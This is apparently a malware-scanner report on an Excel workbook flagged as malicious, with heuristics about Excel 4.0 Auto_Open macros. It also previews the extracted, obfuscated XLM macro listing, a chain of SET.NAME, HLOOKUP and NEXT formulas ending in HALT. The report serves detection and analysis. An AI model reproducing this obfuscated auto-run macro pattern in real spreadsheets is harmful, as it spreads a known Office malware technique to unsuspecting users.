MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6661 bytes |
SHA-256: b77083360d842f1d7f9ffea73c8da1d55b4567563df14bb8a66a3b1d0d03563a |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 15 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - UJuNJQ
' 0018 27 LABEL : Cell Value, String Constant - afwacKrUZmsn len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!E149
' 0018 25 LABEL : Cell Value, String Constant - elpeXzLdSS len=0
' 0018 20 LABEL : Cell Value, String Constant - HDwHj len=0
' 0018 24 LABEL : Cell Value, String Constant - HvswwfuhQ len=0
' 0018 20 LABEL : Cell Value, String Constant - mKoQT len=0
' 0018 21 LABEL : Cell Value, String Constant - mMXiVh len=0
' 0018 27 LABEL : Cell Value, String Constant - NkosEwxJTCSk len=0
' 0018 23 LABEL : Cell Value, String Constant - obDtjUFF len=0
' 0018 24 LABEL : Cell Value, String Constant - raosVDxst len=0
' 0018 20 LABEL : Cell Value, String Constant - rfILa len=0
' 0018 27 LABEL : Cell Value, String Constant - spLCawabegMr len=0
' 0018 23 LABEL : Cell Value, String Constant - sqrBbisA len=0
' 0018 24 LABEL : Cell Value, String Constant - TiEHVuiJZ len=0
' 0018 23 LABEL : Cell Value, String Constant - tMfvSyMb len=0
' 0018 22 LABEL : Cell Value, String Constant - TymtYfX len=0
' 0018 25 LABEL : Cell Value, String Constant - UaVcYHPTpP len=0
' 0018 22 LABEL : Cell Value, String Constant - uLFkZCy len=0
' 0018 22 LABEL : Cell Value, String Constant - VEMvIiX len=0
' 0018 27 LABEL : Cell Value, String Constant - VMKGvgywlERl len=0
' 0018 21 LABEL : Cell Value, String Constant - wZaQAO len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' UJuNJQ,E55,"SET.NAME("HvswwfuhQ",0+VALUE("0"))",""
' UJuNJQ,E57,"SET.NAME("HDwHj",HvswwfuhQ)",""
' UJuNJQ,E61,"SET.NAME("tMfvSyMb",HvswwfuhQ)",""
' UJuNJQ,E66,"SET.NAME("raosVDxst",COUNTA(mMXiVh))",""
' UJuNJQ,E69,"SET.NAME("afwacKrUZmsn",COUNTA(VMKGvgywlERl))",""
' UJuNJQ,E74,[],""
' UJuNJQ,E78,"SET.NAME("spLCawabegMr","")",""
' UJuNJQ,E83,"HDwHj",""
' UJuNJQ,R84,"",310.00000000000000000000
' UJuNJQ,R85,"",-157.00000000000000000000
' UJuNJQ,R86,"",872.00000000000000000000
' UJuNJQ,E87,"SET.NAME("rfILa",HLOOKUP("*",mMXiVh,HDwHj,FALSE))",""
' UJuNJQ,R87,"",215.00000000000000000000
' UJuNJQ,R88,"",-584.00000000000000000000
' UJuNJQ,R89,"",-354.00000000000000000000
' UJuNJQ,E91,"mKoQT",""
' UJuNJQ,E93,"SET.NAME("wZaQAO",HvswwfuhQ)",""
' UJuNJQ,E98,[],""
' UJuNJQ,E101,"wZaQAO",""
' UJuNJQ,E105,"TymtYfX",""
' UJuNJQ,E107,"NkosEwxJTCSk",""
' UJuNJQ,E110,"sqrBbisA",""
' UJuNJQ,E114,"SET.NAME("TiEHVuiJZ",VALUE(HLOOKUP("*",VMKGvgywlERl,sqrBbisA,FALSE)))",""
' UJuNJQ,E116,"VEMvIiX",""
' UJuNJQ,E121,"spLCawabegMr",""
' UJuNJQ,E126,"tMfvSyMb",""
' UJuNJQ,E129,NEXT(),""
' UJuNJQ,E132,"uLFkZCy",""
' UJuNJQ,E136,[],""
' UJuNJQ,E140,"elpeXzLdSS",""
' UJuNJQ,E142,NEXT(),""
' UJuNJQ,E145,RETURN(),""
' UJuNJQ,E179,"SET.NAME("UaVcYHPTpP",E55)",""
' UJuNJQ,E184,"mMXiVh",""
' UJuNJQ,E187,"SET.NAME("VMKGvgywlERl",R62C13)",""
' UJuNJQ,E189,"SET.NAME("elpeXzLdSS",196)",""
' UJuNJQ,E193,"SET.NAME("obDtjUFF",5)",""
' UJuNJQ,E195,UaVcYHPTpP(),""
' UJuNJQ,E196,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.